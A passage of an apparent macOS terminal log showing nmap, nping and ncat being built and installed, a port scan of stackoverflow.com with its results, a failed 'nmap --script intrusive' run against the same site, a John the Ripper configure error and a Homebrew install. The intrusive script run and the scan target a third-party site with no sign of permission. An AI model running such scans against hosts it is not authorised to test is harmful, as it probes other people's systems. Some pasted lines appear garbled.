  1772. /Library/Developer/CommandLineTools/usr/bin/make nping
  1773. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 ArgParser.cc -o ArgParser.o
  1774. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 common.cc -o common.o
  1775. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 common_modified.cc -o common_modified.o
  1776. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 nping.cc -o nping.o
  1777. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 NpingOps.cc -o NpingOps.o
  1778. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 utils.cc -o utils.o
  1779. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 utils_net.cc -o utils_net.o
  1780. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 output.cc -o output.o
  1781. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 stats.cc -o stats.o
  1782. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 NpingTargets.cc -o NpingTargets.o
  1783. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 NpingTarget.cc -o NpingTarget.o
  1784. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 EchoHeader.cc -o EchoHeader.o
  1785. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 EchoServer.cc -o EchoServer.o
  1786. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 EchoClient.cc -o EchoClient.o
  1787. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 ProbeMode.cc -o ProbeMode.o
  1788. ProbeMode.cc:431:29: warning: comparison of array 'pkt' equal to a null pointer
  1789.      is always false [-Wtautological-pointer-compare]
  1790.                        if (pkt == NULL || pktLen <=0)
  1791.                            ^~~    ~~~~
  1792. ProbeMode.cc:482:25: warning: comparison of array 'pkt' equal to a null pointer
  1793.      is always false [-Wtautological-pointer-compare]
  1794.                    if (pkt == NULL || pktLen <=0)
  1795.                        ^~~    ~~~~
  1796. 2 warnings generated.
  1797. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 NEPContext.cc -o NEPContext.o
  1798. g++ -c -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include -g -O2 -Wall  -fno-strict-aliasing   -DHAVE_CONFIG_H -DNPING_NAME=\"Nping\" -DNPING_URL=\"https://nmap.org/nping\" -DNPING_PLATFORM=\"x86_64-apple-darwin17.2.0\" -D_FORTIFY_SOURCE=2 Crypto.cc -o Crypto.o
  1799. Compiling nping
  1800. rm -f nping
  1801. g++ -L../libpcap    -o nping ArgParser.o common.o common_modified.o nping.o NpingOps.o utils.o utils_net.o output.o stats.o NpingTargets.o NpingTarget.o EchoHeader.o EchoServer.o EchoClient.o ProbeMode.o NEPContext.o Crypto.o ../nsock/src/libnsock.a ../nbase/libnbase.a ../libnetutil/libnetutil.a  ../libpcap/libpcap.a ../libdnet-stripped/src/.libs/libdnet.a -lm
  1802. Nping compiled successfully!
  1803. cd ncat && /Library/Developer/CommandLineTools/usr/bin/make
  1804. gcc -MM -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase ncat_main.c ncat_connect.c ncat_core.c ncat_posix.c ncat_listen.c ncat_proxy.c ncat_ssl.c base64.c http.c util.c sys_wrap.c ncat_lua.c > makefile.dep
  1805. Compiling liblua
  1806. make[2]: `liblua.a' is up to date.
  1807. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_main.c -o ncat_main.o
  1808. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_connect.c -o ncat_connect.o
  1809. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_core.c -o ncat_core.o
  1810. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_posix.c -o ncat_posix.o
  1811. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_listen.c -o ncat_listen.o
  1812. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_proxy.c -o ncat_proxy.o
  1813. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_ssl.c -o ncat_ssl.o
  1814. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c base64.c -o base64.o
  1815. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c http.c -o http.o
  1816. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c util.c -o util.o
  1817. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c sys_wrap.c -o sys_wrap.o
  1818. gcc -I./../liblua  -I../libpcap -DHAVE_CONFIG_H -DNCAT_DATADIR="\"/usr/local/share/ncat\"" -D_FORTIFY_SOURCE=2 -I. -I.. -I../nsock/include/ -I../nbase -DLUA_USE_POSIX -DLUA_USE_DLOPEN -DHAVE_LUA=1 -I../liblua -g -O2 -Wall -c ncat_lua.c -o ncat_lua.o
  1819. gcc -o ncat -g -O2 -Wall  -L../libpcap  ncat_main.o ncat_connect.o ncat_core.o ncat_posix.o ncat_listen.o ncat_proxy.o ncat_ssl.o base64.o http.o util.o sys_wrap.o ncat_lua.o ../nsock/src/libnsock.a ../nbase/libnbase.a  -lpcap ./../liblua/liblua.a -lm
  1820.  
  1821.  
  1822.  
  1823.  
  1824.  
  1825.  
  1826.  
  1827.  
  1828. SixMillionKilaTons:nmap osx$ make install
  1829. Compiling libnetutil
  1830. cd libnetutil && /Library/Developer/CommandLineTools/usr/bin/make
  1831. make[1]: Nothing to be done for `all'.
  1832. Compiling liblinear
  1833. make[1]: `liblinear.a' is up to date.
  1834. Compiling libpcap
  1835. make[1]: Nothing to be done for `all'.
  1836. Compiling libpcre
  1837. /Library/Developer/CommandLineTools/usr/bin/make  all-am
  1838. Compiling libnbase
  1839. cd nbase && /Library/Developer/CommandLineTools/usr/bin/make
  1840. make[1]: Nothing to be done for `all'.
  1841. Compiling libnsock
  1842. cd nsock/src && /Library/Developer/CommandLineTools/usr/bin/make
  1843. make[1]: Nothing to be done for `all'.
  1844. Compiling libdnet
  1845. Making all in include
  1846. /Library/Developer/CommandLineTools/usr/bin/make  all-recursive
  1847. Making all in dnet
  1848. make[4]: Nothing to be done for `all'.
  1849. make[4]: Nothing to be done for `all-am'.
  1850. Making all in src
  1851. make[2]: Nothing to be done for `all'.
  1852. make[2]: Nothing to be done for `all-am'.
  1853. Compiling liblua
  1854. make[1]: `liblua.a' is up to date.
  1855. Compiling nmap
  1856. rm -f nmap
  1857. g++ -Lnbase -Lnsock/src/   -o nmap charpool.o FingerPrintResults.o FPEngine.o FPModel.o idle_scan.o MACLookup.o nmap_dns.o nmap_error.o nmap.o nmap_ftp.o NmapOps.o NmapOutputTable.o nmap_tty.o osscan2.o osscan.o output.o payload.o portlist.o portreasons.o protocols.o scan_engine.o scan_engine_connect.o scan_engine_raw.o scan_lists.o service_scan.o services.o TargetGroup.o Target.o targets.o tcpip.o timing.o traceroute.o utils.o xml.o nse_main.o nse_utility.o nse_nsock.o nse_dnet.o nse_fs.o nse_nmaplib.o nse_debug.o nse_pcrelib.o nse_lpeg.o main.o -lnsock -lnbase libpcre/libpcre.a libpcap/libpcap.a   -lz libnetutil/libnetutil.a ./libdnet-stripped/src/.libs/libdnet.a ./liblua/liblua.a ./liblinear/liblinear.a -lm
  1858. /usr/bin/install -c -d /usr/local/bin /usr/local/share/man/man1 /usr/local/share/nmap
  1859. install: mkdir /usr/local/bin: Permission denied
  1860. make: *** [install-nmap] Error 71
  1861.  
  1862.  
  1863.  
  1864.  
  1865.  
  1866. SixMillionKilaTons:nmap osx$ sudo make install
  1867. Password:
  1868. Compiling libnetutil
  1869. cd libnetutil && /Library/Developer/CommandLineTools/usr/bin/make
  1870. make[1]: Nothing to be done for `all'.
  1871. Compiling liblinear
  1872. make[1]: `liblinear.a' is up to date.
  1873. Compiling libpcap
  1874. make[1]: Nothing to be done for `all'.
  1875. Compiling libpcre
  1876. /Library/Developer/CommandLineTools/usr/bin/make  all-am
  1877. Compiling libnbase
  1878. cd nbase && /Library/Developer/CommandLineTools/usr/bin/make
  1879. make[1]: Nothing to be done for `all'.
  1880. Compiling libnsock
  1881. cd nsock/src && /Library/Developer/CommandLineTools/usr/bin/make
  1882. make[1]: Nothing to be done for `all'.
  1883. Compiling libdnet
  1884. Making all in include
  1885. /Library/Developer/CommandLineTools/usr/bin/make  all-recursive
  1886. Making all in dnet
  1887. make[4]: Nothing to be done for `all'.
  1888. make[4]: Nothing to be done for `all-am'.
  1889. Making all in src
  1890. make[2]: Nothing to be done for `all'.
  1891. make[2]: Nothing to be done for `all-am'.
  1892. Compiling liblua
  1893. make[1]: `liblua.a' is up to date.
  1894. Compiling nmap
  1895. rm -f nmap
  1896. g++ -Lnbase -Lnsock/src/   -o nmap charpool.o FingerPrintResults.o FPEngine.o FPModel.o idle_scan.o MACLookup.o nmap_dns.o nmap_error.o nmap.o nmap_ftp.o NmapOps.o NmapOutputTable.o nmap_tty.o osscan2.o osscan.o output.o payload.o portlist.o portreasons.o protocols.o scan_engine.o scan_engine_connect.o scan_engine_raw.o scan_lists.o service_scan.o services.o TargetGroup.o Target.o targets.o tcpip.o timing.o traceroute.o utils.o xml.o nse_main.o nse_utility.o nse_nsock.o nse_dnet.o nse_fs.o nse_nmaplib.o nse_debug.o nse_pcrelib.o nse_lpeg.o main.o -lnsock -lnbase libpcre/libpcre.a libpcap/libpcap.a   -lz libnetutil/libnetutil.a ./libdnet-stripped/src/.libs/libdnet.a ./liblua/liblua.a ./liblinear/liblinear.a -lm
  1897. /usr/bin/install -c -d /usr/local/bin /usr/local/share/man/man1 /usr/local/share/nmap
  1898. /usr/bin/install -c -c -m 755 nmap /usr/local/bin/nmap
  1899. /usr/bin/strip -x /usr/local/bin/nmap
  1900. /usr/bin/install -c -c -m 644 docs/nmap.1 /usr/local/share/man/man1/
  1901. if [ "yes" = "yes" ]; then \
  1902.       for ll in de es fr hr hu it ja pl pt_BR pt_PT ro ru sk zh; do \
  1903.         /usr/bin/install -c -d /usr/local/share/man/$ll/man1; \
  1904.         /usr/bin/install -c -c -m 644 docs/man-xlate/nmap-$ll.1 /usr/local/share/man/$ll/man1/nmap.1; \
  1905.       done; \
  1906.     fi
  1907. /usr/bin/install -c -c -m 644 docs/nmap.xsl /usr/local/share/nmap/
  1908. /usr/bin/install -c -c -m 644 docs/nmap.dtd /usr/local/share/nmap/
  1909. /usr/bin/install -c -c -m 644 nmap-services /usr/local/share/nmap/
  1910. /usr/bin/install -c -c -m 644 nmap-payloads /usr/local/share/nmap/
  1911. /usr/bin/install -c -c -m 644 nmap-rpc /usr/local/share/nmap/
  1912. /usr/bin/install -c -c -m 644 nmap-os-db /usr/local/share/nmap/
  1913. /usr/bin/install -c -c -m 644 nmap-service-probes /usr/local/share/nmap/
  1914. /usr/bin/install -c -c -m 644 nmap-protocols /usr/local/share/nmap/
  1915. /usr/bin/install -c -c -m 644 nmap-mac-prefixes /usr/local/share/nmap/
  1916. /usr/bin/install -c -d /usr/local/share/nmap/scripts
  1917. /usr/bin/install -c -d /usr/local/share/nmap/nselib
  1918. (cd /usr/local/share/nmap/scripts && rm -f anonFTP.nse ASN.nse asn-to-prefix.nse brutePOP3.nse bruteTelnet.nse chargenTest.nse daytimeTest.nse dns-safe-recursion-port.nse dns-safe-recursion-txid.nse dns-test-open-recursion.nse domino-enum-passwords.nse echoTest.nse ftpbounce.nse HTTPAuth.nse HTTP_open_proxy.nse HTTPpasswd.nse HTTPtrace.nse iax2Detect.nse ircServerInfo.nse ircZombieTest.nse mac-geolocation.nse MSSQLm.nse MySQLinfo.nse netbios-smb-os-discovery.nse nfs-acls.nse nfs-dirlist.nse popcapa.nse PPTPversion.nse promiscuous.nse RealVNC_auth_bypass.nse ripeQuery.nse robots.nse showHTMLTitle.nse showHTTPVersion.nse showOwner.nse showSMTPVersion.nse showSSHVersion.nse skype_v2-version.nse smb-enumdomains.nse smb-enumsessions.nse smb-enumshares.nse smb-enumusers.nse smb-serverstats.nse smb-systeminfo.nse SMTPcommands.nse SMTP_openrelay_test.nse smtp-check-vulns.nse SNMPcommunitybrute.nse SNMPsysdescr.nse SQLInject.nse SSH-hostkey.nse SSHv1-support.nse SSLv2-support.nse strangeSMTPport.nse UPnP-info.nse xamppDefaultPass.nse zoneTrans.nse db2-info.nse db2-brute.nse html-title.nse robots.txt.nse xmpp.nse sql-injection.nse http-robtex-reverse-ip.nse http-vuln-zimbra-lfi.nse http-vuln-0-day-lfi-zimbra.nse whois.nse db2-discover.nse http-crossdomainxml.nse http-email-harvest.nse http-wordpress-plugins.nse http-wp-plugins.nse smb-check-vulns.nse)
  1919. /usr/bin/install -c -c -m 644 nse_main.lua /usr/local/share/nmap/
  1920. /usr/bin/install -c -c -m 644 scripts/script.db scripts/*.nse /usr/local/share/nmap/scripts
  1921. /usr/bin/install -c -c -m 644 nselib/*.lua nselib/*.luadoc /usr/local/share/nmap/nselib
  1922. /usr/bin/install -c -d /usr/local/share/nmap/nselib/data
  1923. for f in `find nselib/data -name .svn -prune -o -type d -print`; do \
  1924.         /usr/bin/install -c -d /usr/local/share/nmap/$f; \
  1925.     done
  1926. for f in `find nselib/data -name .svn -prune -o -type f -print`; do \
  1927.         /usr/bin/install -c -c -m 644 $f /usr/local/share/nmap/$f; \
  1928.     done
  1929. /usr/bin/install -c -d /usr/local/bin /usr/local/share/man/man1
  1930. cd zenmap && /usr/bin/python2.7 setup.py --quiet install --prefix "/usr/local" --force
  1931. /usr/bin/install -c -c -m 644 docs/zenmap.1 /usr/local/share/man/man1/
  1932. if [ ! -f /usr/local/bin/nmapfe -o -L /usr/local/bin/nmapfe ]; then \
  1933.         ln -sf zenmap /usr/local/bin/nmapfe; \
  1934.     fi
  1935. ln -sf zenmap /usr/local/bin/xnmap
  1936. cd ncat && /Library/Developer/CommandLineTools/usr/bin/make
  1937. Compiling liblua
  1938. make[2]: `liblua.a' is up to date.
  1939. cd ncat && /Library/Developer/CommandLineTools/usr/bin/make install
  1940. Compiling liblua
  1941. make[2]: `liblua.a' is up to date.
  1942. Installing Ncat
  1943. ../shtool mkdir -f -p -m 755 /usr/local/bin /usr/local/share/man/man1
  1944. /usr/bin/install -c -c -m 755 ncat /usr/local/bin/ncat
  1945. /usr/bin/strip -x /usr/local/bin/ncat
  1946. if [ -n "" ]; then \
  1947.         ../shtool mkdir -f -p -m 755 /usr/local/share/ncat; \
  1948.         /usr/bin/install -c -c -m 644  /usr/local/share/ncat/; \
  1949.     fi
  1950. /usr/bin/install -c -c -m 644 docs/ncat.1 /usr/local/share/man/man1/ncat.1
  1951. cd ndiff && /usr/bin/python2.7 setup.py install --prefix "/usr/local"
  1952. running install
  1953. running build
  1954. running build_py
  1955. running build_scripts
  1956. running install_lib
  1957. copying build/lib/ndiff.py -> /usr/local/lib/python2.7/site-packages
  1958. byte-compiling /usr/local/lib/python2.7/site-packages/ndiff.py to ndiff.pyc
  1959. running install_scripts
  1960. copying build/scripts-2.7/ndiff -> /usr/local/bin
  1961. changing mode of /usr/local/bin/ndiff to 755
  1962. running install_data
  1963. copying docs/ndiff.1 -> /usr/local/share/man/man1
  1964. running install_egg_info
  1965. /Library/Developer/CommandLineTools/usr/bin/make nping
  1966. make[2]: `nping' is up to date.
  1967. cd nping && /Library/Developer/CommandLineTools/usr/bin/make install
  1968. /usr/bin/install -c -d /usr/local/bin /usr/local/share/man/man1
  1969. /usr/bin/install -c -c -m 755 nping /usr/local/bin/nping
  1970. /usr/bin/strip -x /usr/local/bin/nping
  1971. /usr/bin/install -c -c -m 644 docs/nping.1 /usr/local/share/man/man1/
  1972. NPING SUCCESSFULLY INSTALLED
  1973. NMAP SUCCESSFULLY INSTALLED
  1974.  
  1975.  
  1976.  
  1977.  
  1978.  
  1979. SixMillionKilaTons:nmap osx$ cd /
  1980.  
  1981.  
  1982. SixMillionKilaTons:/ osx$ nmap --script intrusive stackoverflow.com
  1983.  
  1984. Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-24 18:42 EST
  1985. NSE: Failed to load /usr/local/bin/../share/nmap/scripts/http-vuln-cve2014-3704.nse:
  1986. ...cal/bin/../share/nmap/scripts/http-vuln-cve2014-3704.nse:10: module 'openssl' not found:
  1987.     NSE failed to find nselib/openssl.lua in search paths.
  1988.     no field package.preload['openssl']
  1989.     no file '/usr/local/share/lua/5.3/openssl.lua'
  1990.     no file '/usr/local/share/lua/5.3/openssl/init.lua'
  1991.     no file '/usr/local/lib/lua/5.3/openssl.lua'
  1992.     no file '/usr/local/lib/lua/5.3/openssl/init.lua'
  1993.     no file './openssl.lua'
  1994.     no file './openssl/init.lua'
  1995.     no file '/usr/local/lib/lua/5.3/openssl.so'
  1996.     no file '/usr/local/lib/lua/5.3/loadall.so'
  1997.     no file './openssl.so'
  1998. stack traceback:
  1999.     [C]: in function 'require'
  2000.     ...cal/bin/../share/nmap/scripts/http-vuln-cve2014-3704.nse:10: in function <...cal/bin/../share/nmap/scripts/http-vuln-cve2014-3704.nse:1>
  2001. NSE: failed to initialize the script engine:
  2002. /usr/local/bin/../share/nmap/nse_main.lua:619: could not load script
  2003. stack traceback:
  2004.     [C]: in function 'error'
  2005.     /usr/local/bin/../share/nmap/nse_main.lua:619: in field 'new'
  2006.     /usr/local/bin/../share/nmap/nse_main.lua:796: in global 'Entry'
  2007.     /usr/local/bin/../share/nmap/scripts/script.db:262: in local 'db_closure'
  2008.     /usr/local/bin/../share/nmap/nse_main.lua:809: in local 'get_chosen_scripts'
  2009.     /usr/local/bin/../share/nmap/nse_main.lua:1312: in main chunk
  2010.     [C]: in ?
  2011.  
  2012. QUITTING!
  2013.  
  2014.  
  2015.  
  2016.  
  2017.  
  2018.  
  2019.  
  2020.  
  2021.  
  2022. SixMillionKilaTons:/ osx$ nmap stackoverflow.com
  2023.  
  2024. Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-24 18:42 EST
  2025. Nmap scan report for stackoverflow.com (151.101.65.69)
  2026. Host is up (0.027s latency).
  2027. Other addresses for stackoverflow.com (not scanned): 151.101.193.69 151.101.1.69 151.101.129.69
  2028. Not shown: 994 closed ports
  2029. PORT    STATE    SERVICE
  2030. 25/tcp  filtered smtp
  2031. 80/tcp  open     http
  2032. 135/tcp filtered msrpc
  2033. 139/tcp filtered netbios-ssn
  2034. 443/tcp open     https
  2035. 445/tcp filtered microsoft-ds
  2036.  
  2037. Nmap done: 1 IP address (1 host up) scanned in 15.48 seconds
  2038.  
  2039.  
  2040.  
  2041.  
  2042. SixMillionKilaTons:/ osx$ man nmap
  2043. //Shows nap man page now's native CPU features
  2044. checking for MMX... yes
  2045. checking for SSE2... yes
  2046. checking for SSSE3... yes
  2047. checking for SSE4.1... yes
  2048. checking for AVX... no
  2049. checking for as... /usr/bin/as
  2050. checking that 'as' works for AVX... no
  2051. checking for arch.h alternative... x86-64.h
  2052. checking for 32/64 bit... 64-bit
  2053. checking for extra ASFLAGS...  -DUNDERSCORES -DBSD -DALIGN_LOG
  2054. checking for X32 ABI... no
  2055. checking for unaligned memory access allowed... yes
  2056. checking for byte ordering according to target triple... little
  2057. checking additional paths for OpenSSL... none
  2058. checking openssl/opensslv.h usability... no
  2059. checking openssl/opensslv.h presence... no
  2060. checking for openssl/opensslv.h... no
  2061. configure: error: in `/Applications/john/src':
  2062. configure: error: JtR requires OpenSSL headers being installed
  2063. See `config.log' for more details
  2064. SixMillionKilaTons:src osx$ man brew
  2065. No manual entry for brew
  2066.  
  2067.  
  2068.  
  2069.  
  2070.  
  2071.  
  2072.  
  2073. SixMillionKilaTons:src osx$ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
  2074. ==> This script will install:
  2075. /usr/local/bin/brew
  2076. /usr/local/share/doc/homebrew
  2077. /usr/local/share/man/man1/brew.1
  2078. /usr/local/share/zsh/site-functions/_brew
  2079. /usr/local/etc/bash_completion.d/brew
  2080. /usr/local/Homebrew
  2081. ==> The following existing directories will be made group writable:
  2082. /usr/local/bin
  2083. /usr/local/lib
  2084. /usr/local/sbin
  2085. /usr/local/share
  2086. /usr/local/share/man
  2087. /usr/local/share/man/man1
  2088. ==> The following existing directories will have their owner set to osx:
  2089. /usr/local/bin
  2090. /usr/local/lib
  2091. /usr/local/sbin
  2092. /usr/local/share
  2093. /usr/local/share/man
  2094. /usr/local/share/man/man1
  2095. ==> The following new directories will be created:
  2096. /usr/local/Cellar
  2097. /usr/local/Homebrew
  2098. /usr/local/Frameworks
  2099. /usr/local/etc
  2100. /usr/local/include
  2101. /usr/local/opt
  2102. /usr/local/share/zsh
  2103. /usr/local/share/zsh/site-functions
  2104. /usr/local/var
  2105.  
  2106. Press RETURN to continue or any other key to abort
  2107. ==> /usr/bin/sudo /bin/chmod u+rwx /usr/local/bin /usr/local/lib /usr/local/sbin /usr/local/share /usr/local/share/man /usr/local/share/man/man1
  2108. Password:
  2109. ==> /usr/bin/sudo /bin/chmod g+rwx /usr/local/bin /usr/local/lib /usr/local/sbin /usr/local/share /usr/local/share/man /usr/local/share/man/man1
  2110. ==> /usr/bin/sudo /usr/sbin/chown osx /usr/local/bin /usr/local/lib /usr/local/sbin /usr/local/share /usr/local/share/man /usr/local/share/man/man1
  2111. ==> /usr/bin/sudo /bin/mkdir -p /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/opt /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
  2112. ==> /usr/bin/sudo /bin/chmod g+rwx /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/opt /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
  2113. ==> /usr/bin/sudo /bin/chmod 755 /usr/local/share/zsh /usr/local/share/zsh/site-functions
  2114. ==> /usr/bin/sudo /usr/sbin/chown osx /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/opt /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
  2115. ==> /usr/bin/sudo /usr/bin/chgrp admin /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/opt /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
  2116. ==> /usr/bin/sudo /bin/mkdir -p /Users/osx/Library/Caches/Homebrew
